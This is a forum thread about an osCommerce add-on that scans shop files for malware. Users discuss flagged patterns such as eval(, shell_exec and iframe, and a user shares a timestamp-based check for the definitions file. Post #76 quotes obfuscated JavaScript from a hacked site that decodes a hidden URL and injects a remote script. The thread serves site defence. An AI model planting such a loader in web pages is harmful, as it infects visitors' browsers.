
osCommerce VTS


90 replies to this topic

#61 sijo

  • Community Member
  • 268 posts
  • Real Name:Stein Ivar Johnsen
  • Gender:Male
  • Location:Norway

Posted 27 November 2010, 16:07

jfkafka, on 27 November 2010, 14:40, said:

Thanks for your swift response.

Could you explain why error_reporting(0
is considered a threat?

Also once you check a file, is there a way to mark
that particular line as safe for future scans?

jk

Q1: It's a 'nota bene' because some unfriendly scripts could turn off error reporting for some reason..
Q2: It could be done, but I don't have the time to look into it now...
---------------
regards
sijo
---------------

Contrib: JMrating10 - Rate your products / osCommerce VTS - Virus & Threat Scanner

(osCommerce VTS now also checks for leading and trailing whitespace and also has a grep function)

#62 Annisse

  • Community Member
  • 79 posts
  • Real Name:Annette
  • Gender:Female

Posted 28 November 2010, 10:24

Hi Sijo!

Just installed your latest version of VTS and got this... should any of these be a concern to me? I just cleaned up a bunch of suspected infected files which I compared to an original copy of my catalog store which were not there before.

Thanks for your help!
~Annissë


Scan Completed

osCommerce Virus & Threat Scan v1.0.8

Scan root: <path>/public_html

Threats Definitions: 281

Files Definitions: 22

Scanned folders: 175

Scanned files: 1205

Possible Infected files: 15

Possible Threat files: 0

Whitespace found: 0

Possible Infection: <path>/public_html/flashmo_118_fashion_gallery_v8.html (Known automated hack <=> eval( ) on line: 22

Possible Infection: <path>/public_html/corel.html (Known automated hack <=> eval( ) on line: 10

Possible Infection: <path>/public_html/AC_ActiveX.js (Known automated hack <=> eval( ) on line: 84

Possible Infection: <path>/public_html/buttontest/AC_RunActiveContent.js (Known automated hack <=> eval( ) on line: 303

Possible Infection: <path>/public_html/catalog/includes/functions/general.php (Known automated hack <=> eval( ) on line: 482

Possible Infection: <path>/public_html/catalog/includes/functions/compatibility.php (Known automated hack <=> eval( ) on line: 84

Possible Infection:<path>/public_html/catalog/includes/languages/english/cookie_usage.php (Known automated hack <=> eval( ) on line: 1

Possible Infection: <path>/public_html/catalog/admin/easypopulate.php (Known automated hack <=> eval( ) on line: 1439

Possible Infection: <path>/public_html/catalog/admin/modules.php (Known automated hack <=> eval( ) on line: 213

Possible Infection: <path>/public_html/catalog/admin/AV/grep.php (Known automated hack <=> error_reporting(0) ) on line: 56

Possible Infection: <path>/public_html/catalog/admin/AV/index.php (Known automated hack <=> error_reporting(0) ) on line: 34

Possible Infection: <path>/public_html/catalog/admin/includes/functions/general.php (Known automated hack <=> eval( ) on line: 405

Possible Infection: <path>/public_html/catalog/admin/includes/modules/newsletters/product_notification.php (Known automated hack <=> eval( ) on line: 61

Possible Infection: <path>/public_html/catalog/admin/includes/javascript/calendarcode.js (Known automated hack <=> eval( ) on line: 57

Possible Infection: <path>/public_html/catalog/admin/configuration.php (Known automated hack <=> eval( ) on line: 125

==>> You should rename your admin folder ! How to rename admin



Edited by Mark Evans, 30 November 2010, 13:37.


#63 sijo

  • Community Member
  • 268 posts
  • Real Name:Stein Ivar Johnsen
  • Gender:Male
  • Location:Norway

Posted 29 November 2010, 09:23

Annisse, on 28 November 2010, 10:24, said:

Hi Sijo!

Just installed your latest version of VTS and got this... should any of these be a concern to me? I just cleaned up a bunch of suspected infected files which I compared to an original copy of my catalog store which were not there before.

First: You should not list your server path in public like you did here.

Since I don't know the addons you are using, you have to compare the reported files with your original ones to see if there are any diffs or maybe files that should not be there.

Files reported in ocVTS' folder AV are ok..

And you should rename your admin dir.
---------------
regards
sijo
---------------


#64 Annisse

  • Community Member
  • 79 posts
  • Real Name:Annette
  • Gender:Female

Posted 30 November 2010, 12:16

sijo, on 29 November 2010, 09:23, said:

First: You should not list your server path in public like you did here.

Since I don't know the addons you are using, you have to compare the reported files with your original ones to see if there are any diffs or maybe files that should not be there.

Files reported in ocVTS' folder AV are ok..

And you should rename your admin dir.

Great. I knew that I probably should have not done this, I am trying to find a way to delete my post but can't seem to find any information.

Thanks for your help regarding my question.

#65 Annisse

  • Community Member
  • 79 posts
  • Real Name:Annette
  • Gender:Female

Posted 01 December 2010, 10:32

Thanks for editing my post Mark :)

#66 jfkafka

  • Community Member
  • 161 posts
  • Real Name:john kafka

Posted 05 December 2010, 21:55

Hi Sijo,

Hope all is excellent with you.

The mod works great (Thanks very much!) on hosted sites. However using a local machine with XAMPP, php 5.3, VTS 1.0.8,
and windows xp,
getting this when running ocVTS:

Fatal error: Virus.def vulnerable to overwrite, please change permissions in C:\server\xampp\htdocs\public_html\renamed ADMIN FOLDER\AV\ocVTS.php on line 78

code from line 78:
// load virus defs from flat file
if (!check_defs('virus.def'))
trigger_error("Virus.def vulnerable to overwrite, please change permissions", E_USER_ERROR);
$defs = load_defs('virus.def', $CONFIG['debug']);
$filedefs = load_filedefs('files.def', $CONFIG['debug']);
----- end of code -------

tried setting the file to read only, no joy
tried using virus.def from hosted site with file permissions 644
but when uploaded to local site
the permissions show up as xxx with all the boxes filled in,

Do you have any suggestions on how to solve this and help turn a crying.gif into a smiley face?
Thanks,
jk

Edited by jfkafka, 05 December 2010, 22:08.


#67 sijo

  • Community Member
  • 268 posts
  • Real Name:Stein Ivar Johnsen
  • Gender:Male
  • Location:Norway

Posted 06 December 2010, 10:18

jfkafka, on 05 December 2010, 21:55, said:

Hi Sijo,

Hope all is excellent with you.

The mod works great (Thanks very much!) on hosted sites. However using a local machine with XAMPP, php 5.3, VTS 1.0.8,
and windows xp,
getting this when running ocVTS:

Fatal error: Virus.def vulnerable to overwrite, please change permissions in C:\server\xampp\htdocs\public_html\renamed ADMIN FOLDER\AV\ocVTS.php on line 78

I have never tested it on a local machine and I don't have the possibility to do it either. I don't think I can help you with this, sorry...
You could try to comment out these two lines like this:
//if (!check_defs('virus.def'))
//trigger_error("Virus.def vulnerable to overwrite, please change permissions", E_USER_ERROR);

---------------
regards
sijo
---------------


#68 jfkafka

  • Community Member
  • 161 posts
  • Real Name:john kafka

Posted 06 December 2010, 14:31

sijo, on 06 December 2010, 10:18, said:

I have never tested it on a local machine and I don't have the possibility to do it either. I don't think I can help you with this, sorry...
You could try to comment out these two lines like this:
//if (!check_defs('virus.def'))
//trigger_error("Virus.def vulnerable to overwrite, please change permissions", E_USER_ERROR);

Thanks for your swift response.
Howbout this, check the date of the 'virus.def' file and if it is different then it has been altered?

jk

#69 jfkafka

  • Community Member
  • 161 posts
  • Real Name:john kafka

Posted 06 December 2010, 18:44

jfkafka, on 06 December 2010, 14:31, said:

Howbout this, check the date of the 'virus.def' file and if it is different then it has been altered?

jk

After following your suggestion to comment:
//if (!check_defs('virus.def'))
//trigger_error("Virus.def vulnerable to overwrite, please change permissions", E_USER_ERROR);

I googled around and came up with a Plan B way to check the virus.def file,
in case anyone might find it useful or have any input on improving it

in admin/AV/ocvts.php

FIND
if (!check_defs('virus.def'))
trigger_error("Virus.def vulnerable to overwrite, please change permissions", E_USER_ERROR);

REPLACE WITH
//if (!check_defs('virus.def'))
//trigger_error("Virus.def vulnerable to overwrite, please change permissions", E_USER_ERROR);

// added new function to check the 'virus.def' File's Date Last Modified
filemtime_r('virus.def');

then add the new 'filemtime_r' function

FIND
# Updated to v.1.0.2 by sijo 220310
# Updated to v.1.0.3 by sijo 310310
# Updated to v.1.0.4 by sijo 230410
# Updated to v.1.0.5 by sijo 040510
# Updated to v.1.0.6 by sijo 190510
# Updated to v.1.0.7 by sijo 140910
# Updated to v.1.0.8 by sijo 260910

*/

ADD BELOW THAT

// 12-5-10 modified combination of code courtesy of:
// 1. avi at live dot com 02-Feb-2009 11:22 (http://php.net/manual/en/function.filemtime.php)
// 2. http://www.w3schools.com/PHP/func_filesystem_filemtime.asp
// 3. http://w3schools.com/PHP/func_filesystem_clearstatcache.asp

// Only take into account those files whose extensions you want to show.
// (In this case the only allowed extension is def)

$allowedExtensions = array(
// 'zip',
// 'rar',
// 'pdf',
// 'txt',
'def'
);

function filemtime_r($path) {
global $allowedExtensions;
// testing echo ' in av/ocvts.php function filemtime_r and path = ' . $path;

if (!file_exists($path)) {
// testing echo ' in av/ocvts.php function filemtime_r and file doesn"t exist = ' . $path . '<br />';
exit('File: - ' . $path . ' - NOT FOUND in admin/AV Folder (need to add it)');
return 0;
}
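// end() takes its argument by reference, so pass a variable rather than the explode() result
$parts = explode(".", $path);
$extension = end($parts);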
// testing echo ' in av/ocvts.php function filemtime_r and extension = ' . $extension . '<br />';


if (is_file($path) && in_array($extension, $allowedExtensions)) {

// testing echo ' in av/ocvts.php function filemtime_r and is file(path) and in array(extension, allowedExtensions) ' . $extension . '<br />';

$last_authorized_modified = 1291651410;
$last_file_modified = filemtime($path);

if ($last_file_modified != $last_authorized_modified) {
echo '<h1> File Authenticity Error! </h1>';
echo '<br />';
// testing echo "Last Authorized modified: ". date("F d Y H:i:s.",filemtime($last_authorized_modified));
// testing echo '<br />';
// testing echo "Last modified: ". date("F d Y H:i:s.",filemtime($path));
// testing echo '<br />';
echo 'Exiting until File - virus.def - Authenticity has been Verified (' . $last_file_modified . ')<br />'
. 'If this IS an Authorized new file,' . '<br />'
. ' (in admin/AV/ocVTS.php)'. '<br />'
. 'change this line TO - $last_authorized_modified = ' . $last_file_modified
. '<br />' . 'Otherwise REPLACE current - virus.def - with the <b>LAST Authorized</b> - virus.def - File.' .
'<br />' . 'This error indicates possible Site Security breach.';

exit();

} else { // AUTHENTICITY VERIFIED - ($last_file_modified = $last_authorized_modified)
// OK TO CONTINUE WITH SCAN

// testing echo filemtime($path);
// testing echo '<br />';
// testing echo 'File Authenticity Verified:';
// testing echo '<br />';
// testing echo 'Last modified: ' . date('F d Y H:i:s.',filemtime($path));

} // X if ($last_file_modified != $last_authorized_modified) {

// Note (from w3schools.com): The result of this function are cached. Use clearstatcache() to clear the cache.
clearstatcache();

} // X if (is_file($path) && in_array($extension, $allowedExtensions)) {

} // X function filemtime_r($path) {
// X 12-5-10 modified combination of code courtesy of: ...

---------- end of code -----------

I left the name of the function - filemtime_r($path), so anyone can check it from the first reference
1. avi at live dot com 02-Feb-2009 11:22 (http://php.net/manual/en/function.filemtime.php)
(of course I modified it for this purpose)

Sijo, hope you don't mind my posting this - just wanted to share (as per your inspiring example!)

jk

#70 jfkafka

  • Community Member
  • 161 posts
  • Real Name:john kafka

Posted 06 December 2010, 19:23

sorry, couldn't edit and add these things I thought of right after I hit the submit

so here it is with some extra info

jfkafka, on 06 December 2010, 14:31, said:

Howbout this, check the date of the 'virus.def' file and if it is different then it has been altered?

jk

After following your suggestion to comment:
//if (!check_defs('virus.def'))
//trigger_error("Virus.def vulnerable to overwrite, please change permissions", E_USER_ERROR);

I googled around and came up with a Plan B way to check the virus.def file,
in case anyone might find it useful or have any input on improving it

This works on my localhost machine using XAMPP, php5.3 and VTS1_0_8
I haven't tried it on the hosted site yet

oh yeah USE AT YOUR OWN RISK

in admin/AV/ocvts.php

FIRST - BACKUP ocvts.php - FIRST!
I just rename the file ocvts12510.php (add the date so I know when it was changed)
and save it

FIND
if (!check_defs('virus.def'))
trigger_error("Virus.def vulnerable to overwrite, please change permissions", E_USER_ERROR);

REPLACE WITH
//if (!check_defs('virus.def'))
//trigger_error("Virus.def vulnerable to overwrite, please change permissions", E_USER_ERROR);

// added new function to check the 'virus.def' File's Date Last Modified
filemtime_r('virus.def');

then add the new 'filemtime_r' function

FIND
# Updated to v.1.0.2 by sijo 220310
# Updated to v.1.0.3 by sijo 310310
# Updated to v.1.0.4 by sijo 230410
# Updated to v.1.0.5 by sijo 040510
# Updated to v.1.0.6 by sijo 190510
# Updated to v.1.0.7 by sijo 140910
# Updated to v.1.0.8 by sijo 260910

*/

ADD BELOW THAT

// 12-5-10 modified combination of code courtesy of:
// 1. avi at live dot com 02-Feb-2009 11:22 (http://php.net/manual/en/function.filemtime.php)
// 2. http://www.w3schools.com/PHP/func_filesystem_filemtime.asp
// 3. http://w3schools.com/PHP/func_filesystem_clearstatcache.asp

// Only take into account those files whose extensions you want to show.
// (In this case the only allowed extension is def)

$allowedExtensions = array(
// 'zip',
// 'rar',
// 'pdf',
// 'txt',
'def'
);

function filemtime_r($path) {
global $allowedExtensions;
// testing echo ' in av/ocvts.php function filemtime_r and path = ' . $path;

if (!file_exists($path)) {
// testing echo ' in av/ocvts.php function filemtime_r and file doesn"t exist = ' . $path . '<br />';
exit('File: - ' . $path . ' - NOT FOUND in admin/AV Folder (need to add it)');
return 0;
}
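// end() takes its argument by reference, so pass a variable rather than the explode() result
$parts = explode(".", $path);
$extension = end($parts);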
// testing echo ' in av/ocvts.php function filemtime_r and extension = ' . $extension . '<br />';


if (is_file($path) && in_array($extension, $allowedExtensions)) {

// testing echo ' in av/ocvts.php function filemtime_r and is file(path) and in array(extension, allowedExtensions) ' . $extension . '<br />';

$last_authorized_modified = 1291651410;
$last_file_modified = filemtime($path);

if ($last_file_modified != $last_authorized_modified) {
echo '<h1> File Authenticity Error! </h1>';
echo '<br />';
// testing echo "Last Authorized modified: ". date("F d Y H:i:s.",filemtime($last_authorized_modified));
// testing echo '<br />';
// testing echo "Last modified: ". date("F d Y H:i:s.",filemtime($path));
// testing echo '<br />';
echo 'Exiting until File - virus.def - Authenticity has been Verified (' . $last_file_modified . ')<br />'
. 'If this IS an Authorized new file,' . '<br />'
. ' (in admin/AV/ocVTS.php)'. '<br />'
. 'change this line TO - $last_authorized_modified = ' . $last_file_modified
. '<br />' . 'Otherwise REPLACE current - virus.def - with the <b>LAST Authorized</b> - virus.def - File.' .
'<br />' . 'This error indicates possible Site Security breach.';

exit();

} else { // AUTHENTICITY VERIFIED - ($last_file_modified = $last_authorized_modified)
// OK TO CONTINUE WITH SCAN

// testing echo filemtime($path);
// testing echo '<br />';
// testing echo 'File Authenticity Verified:';
// testing echo '<br />';
// testing echo 'Last modified: ' . date('F d Y H:i:s.',filemtime($path));

} // X if ($last_file_modified != $last_authorized_modified) {

// Note (from w3schools.com): The result of this function are cached. Use clearstatcache() to clear the cache.
clearstatcache();

} // X if (is_file($path) && in_array($extension, $allowedExtensions)) {

} // X function filemtime_r($path) {
// X 12-5-10 modified combination of code courtesy of: ...

---------- end of code -----------

NOW TO TEST IT:
1. go to admin/tools and click VTS Virus & Threat Scanner
2. Click ocVTS Scan your site using 'virus.def' and 'files.def' files
3. You should get an error Page with the message:

File Authenticity Error!
Exiting until File - virus.def - Authenticity has been Verified (1291651410)
If this IS an Authorized new file,
(in admin/AV/ocVTS.php)
change this line TO - $last_authorized_modified = 1291651410
Otherwise REPLACE current - virus.def - with the LAST Authorized - virus.def - File.
This error indicates possible Site Security breach.

4. Don't Panic- this is to show it's working
5. The message tells you what to do
6. for instance

If this IS an Authorized new file,
(in admin/AV/ocVTS.php)
change this line TO - $last_authorized_modified = 1291651410
NOTE: this number may be different for your version of virus.def,
I'm using the virus.def from VTS 1_0_8

Whatever that number is
change the line
in admin/AV/ocVTS.php to match it
just copy and paste that number from
$last_authorized_modified = WHATEVER NUMBER
over the existing number in the line
$last_authorized_modified = 1291651410

now run the scan again and it should pass the test
(now it matches the result of the filemtime($path) php function for the virus.def File)
hope this all makes sense and doesn't cause drowsiness

and whenever this virus.def File is updated/replaced
go thru these steps again

I left the name of the function - filemtime_r($path), so anyone can check it from the first reference
1. avi at live dot com 02-Feb-2009 11:22 (http://php.net/manual/en/function.filemtime.php)
(of course I modified it for this purpose)

Sijo, hope you don't mind my posting this - just wanted to share (as per your inspiring example!)

jk
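
Added example, not part of the original posts or of ocVTS: the timestamp comparison in posts #69 and #70 only notices a change if the file's mtime changes, and mtime can be set back with touch(). The sketch below runs that check next to a SHA-256 content check on a constructed stand-in for virus.def; the function names and the temp file are assumptions, and hash_equals() needs PHP 5.6 or later.

```php
<?php
// Added example: compares an mtime check with a content-hash check.
// Function names are hypothetical; the file content is constructed sample data.

/** The thread's approach: compare the file's mtime to a stored value. */
function defs_mtime_ok($path, $authorized_mtime) {
    clearstatcache(true, $path);   // clear the stat cache before reading, not after
    return is_file($path) && filemtime($path) === $authorized_mtime;
}

/** Content-based check: compare the file's SHA-256 to a stored digest. */
function defs_hash_ok($path, $authorized_sha256) {
    if (!is_file($path) || !is_readable($path)) {
        return false;
    }
    $actual = hash_file('sha256', $path);
    // hash_equals() compares in constant time
    return $actual !== false && hash_equals($authorized_sha256, $actual);
}

function report($label, $path, $mtime, $sha256) {
    printf("%-28s mtime check: %-5s  hash check: %s\n",
        $label,
        var_export(defs_mtime_ok($path, $mtime), true),
        var_export(defs_hash_ok($path, $sha256), true));
}

// --- Constructed demo: a temp file stands in for virus.def ---
$path = tempnam(sys_get_temp_dir(), 'def');
file_put_contents($path, "eval(\nerror_reporting(0)\nshell_exec\n");

$authorized_mtime = 1291651410;            // the value used in the post
touch($path, $authorized_mtime);           // give the stand-in that timestamp
$authorized_sha256 = hash_file('sha256', $path);

report('authorized file', $path, $authorized_mtime, $authorized_sha256);

// The definitions lose a signature, and the timestamp is put back afterwards.
file_put_contents($path, "eval(\nerror_reporting(0)\n");
touch($path, $authorized_mtime);

report('edited, timestamp restored', $path, $authorized_mtime, $authorized_sha256);

unlink($path);
```

Keep the stored digest somewhere the web server account cannot write; anyone able to alter virus.def in place could otherwise alter the expected value as well.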

#71 sijo

  • Community Member
  • 268 posts
  • Real Name:Stein Ivar Johnsen
  • Gender:Male
  • Location:Norway

Posted 31 December 2010, 10:23

I am sorry to tell that osCommerce VTS will no longer be supported. I have closed my netshop and will be doing other things in the future.

I wish you all a Happy New Year!
---------------
regards
sijo
---------------


#72 geoffreywalton

  • Community Sponsor
  • 7,731 posts
  • Real Name:Geoffrey Walton
  • Gender:Male
  • Location:Norfolk, UK (close to the centre of the universe)

Posted 31 December 2010, 12:44

I have added this thread to my watch list and will try to support this contribution as well as Stein has done.

Thanks for developing this in the first place and all your input over time.

Cheers

G
Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

Virus Threat Scanner
My Contributions
Basic install answers.
Click here for Contributions / Add Ons.
UK your site.
Site Move.
Basic design info.

For links mentioned in old answers that are no longer here follow this link Useful Threads.

If this post was useful, click the Like This button over there ======>>>>>.

#73 Mort-lemur

  • Community Member
  • 1,045 posts
  • Real Name:Heather
  • Gender:Female
  • Location:UK

Posted 25 February 2011, 16:44

Hi,

Installed the latest version and it works great.

One request from me - the results show in very small text, how can the size of the results text be increased? Maybe I just need Glasses ...

Thanks
Now my store is the way I want it - Secure, working well, and good Google Ranks - Thanks to all for the help given.

If you want to see the mods I have installed, then see my profile.

#74 Mort-lemur

  • Community Member
  • 1,045 posts
  • Real Name:Heather
  • Gender:Female
  • Location:UK

Posted 25 February 2011, 18:29

Hi,

Please ignore my last post - found where to modify text size.

Thanks

#75 redfoxmedia

  • Community Member
  • 22 posts
  • Real Name:Lance Redgrave
  • Gender:Male
  • Location:Australia

Posted 05 March 2011, 03:24

sdsd

Edited by redfoxmedia, 05 March 2011, 03:27.


#76 m2calabr

  • Community Member
  • 3 posts
  • Real Name:Michael Calabrese
  • Location:Eugene, OR USA

Posted 25 March 2011, 20:47

Another search string should be for fromCharCode (in all JavaScript). I had a site hacked; some of the inserted code was obfuscated very well. The embedded JavaScript code looked like:
   var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a84', '#82837e', '#40403d', '#727e7c', '#3e7982', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00');
   var redef_colors = 1;
   var colors_picked = 0;

   function div_pick_colors(t,styled) {
	var s = "";
	for (j=0;j<t.length;j++) {
		var c_rgb = t[j];
		for (i=1;i<7;i++) {
			var c_clr = c_rgb.substr(i++,2);
			if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15);
		}
	}
	if (styled) {
		s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));
	} else {
		s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();
	}
	return s;
   }

   function try_pick_colors() {
	try {
	   	if(!document.getElementById || !document.createElement){
			document.write(div_pick_colors(div_colors,1));
		   } else {
			var new_cstyle=document.createElement("script");
			new_cstyle.type="text/javascript";
			new_cstyle.src=div_pick_colors(div_colors,0);
			document.getElementsByTagName("head")[0].appendChild(new_cstyle);
		}
	} catch(e) { }
	try {
		check_colors_picked();
	} catch(e) {
		setTimeout("try_pick_colors()", 500);
	}
   }

Just a heads up.
<><
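
Added example, not part of the original post or of ocVTS: a line-based check in the spirit of the fromCharCode suggestion above. It reports each indicator with its line numbers and escalates only when character-code decoding appears in the same file as dynamic script insertion, since fromCharCode alone also has ordinary uses. The indicator list, function names and both sample snippets are constructed for illustration.

```php
<?php
// Added example: heuristic indicators for decoded-at-runtime script loaders.
// Indicator names, function names and the samples below are constructed.

$indicators = array(
    'fromCharCode'   => '/String\s*\.\s*fromCharCode\s*\(/i',
    'hex parseInt'   => '/parseInt\s*\([^)]*,\s*16\s*\)/i',
    'script element' => '/createElement\s*\(\s*["\']script["\']\s*\)/i',
    'document.write' => '/document\s*\.\s*write\s*\(/i',
    'string timer'   => '/setTimeout\s*\(\s*["\']/i',
);

/** Return array(indicator name => list of 1-based line numbers). */
function scan_js($source, array $indicators) {
    $hits = array();
    foreach (preg_split('/\R/', $source) as $i => $line) {
        foreach ($indicators as $name => $regex) {
            if (preg_match($regex, $line)) {
                $hits[$name][] = $i + 1;
            }
        }
    }
    return $hits;
}

/** Escalate only when decoding and script insertion occur together. */
function looks_like_decoded_loader(array $hits) {
    $decodes = isset($hits['fromCharCode']);
    $injects = isset($hits['script element']) || isset($hits['document.write']);
    return $decodes && $injects;
}

// Constructed sample: ordinary keyboard handling that uses fromCharCode.
$benign = <<<'JS'
document.onkeypress = function (e) {
  var ch = String.fromCharCode(e.which);
  if (ch === "q") { closeDialog(); }
};
JS;

// Constructed sample with the same shape as the code in the post:
// a string built from hex pairs, then used as the src of a new script element.
$suspect = <<<'JS'
var palette = new Array('#000000');
function pick(t) {
  var s = "";
  for (var j = 0; j < t.length; j++) {
    s += String.fromCharCode(parseInt(t[j].substr(1, 2), 16) - 15);
  }
  return s;
}
var el = document.createElement("script");
el.src = pick(palette);
JS;

foreach (array('benign.js' => $benign, 'suspect.js' => $suspect) as $name => $src) {
    $hits = scan_js($src, $indicators);
    $verdict = looks_like_decoded_loader($hits) ? 'REVIEW FIRST' : 'low priority';
    echo $name . ': ' . $verdict . "\n";
    foreach ($hits as $indicator => $lines) {
        echo '  ' . $indicator . ' on line(s) ' . implode(', ', $lines) . "\n";
    }
}
```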

#77 jaggster

  • Community Member
  • 24 posts
  • Real Name:John Grapsas

Posted 18 June 2011, 08:23

I installed latest VTS and ran it. It found "possibly" infected files and potential threats, mostly of the form:

Possible Infection: /usr/local/pem/vhosts/103373/webspace/httpdocs/[fake catalog]/includes/functions/general.php (Known automated hack <=> eval( ) on line: 506
or
Possible Infection: /usr/local/pem/vhosts/103373/webspace/httpdocs/[my catalog]/[my admin]/jquery/fancybox/jquery.fancybox-1.3.4.pack.js (Known automated hack <=> iframe) on line: 20

Are there any valid uses of eval() and iframe ? How do I know if it is or isn't infected?

File could be a potentional threat: /usr/local/pem/vhosts/103373/webspace/httpdocs/[my catalog]/cookie_usage.php (Known filename threat)
File could be a potentional threat: /usr/local/pem/vhosts/103373/webspace/httpdocs/[my catalog]/image.php (Known filename threat)
File could be a potentional threat: /usr/local/pem/vhosts/103373/webspace/httpdocs/[my catalog]/includes/languages/english/cookie_usage.php (Known filename threat)
File could be a potentional threat: /usr/local/pem/vhosts/103373/webspace/httpdocs/[my catalog]/ent/mail.php (Known filename threat)
File could be a potentional threat: /usr/local/pem/vhosts/103373/webspace/httpdocs/[my catalog]/ent/includes/languages/english/mail.php (Known filename threat)


and 1 shell exec warning in a non osc file:

Possible Infection: /usr/local/pem/vhosts/103373/webspace/httpdocs/contact/libs/php-captcha.inc.php (Known automated hack <=> shell_exec ) on line: 466

What should I be doing about this? Thank you for any assistance you can offer.

#78 geoffreywalton

  • Community Sponsor
  • 7,731 posts
  • Real Name:Geoffrey Walton
  • Gender:Male
  • Location:Norfolk, UK (close to the centre of the universe)

Posted 19 June 2011, 20:44

These messages indicate that it is possible that there is malicious code in the files mentioned.

You need to go and look at the code in those files and see what it does and make an informed opinion.

It is not possible to tell if there is a problem without seeing the code.

HTH

G

#79 tmckee

  • Community Member
  • 48 posts
  • Real Name:Thomas Mckee
  • Gender:Male
  • Location:Springfield, MO

Posted 28 September 2011, 06:46

I am using:
  • osCommerce 2.3.1
  • PHP 5.2
  • Apache
  • osCommerce Virus & Threat Scanner v1.0.12 (although the title of it when I downloaded it was osCommerce Virus & Threat Scanner v1.0.13)
I installed as per the instructions (very straightforward). I go to the admin page and click on 'Virus & Threat Scan' and then on 'ocVTS'. In both FF and IE, the page churns away and then I get '500 Internal Server Error'. What could be causing this?

#80 jperezbadia

  • Community Member
  • 3 posts
  • Real Name:Joel Perez
  • Gender:Male
  • Location:Republica Dominicana

Posted 27 January 2012, 02:49

Please, someone help me with this error:
Fatal error: Maximum execution time of 30 seconds exceeded in /home2/jpreloje/public_html/adminlahia/AV/ocVTS.php on line 353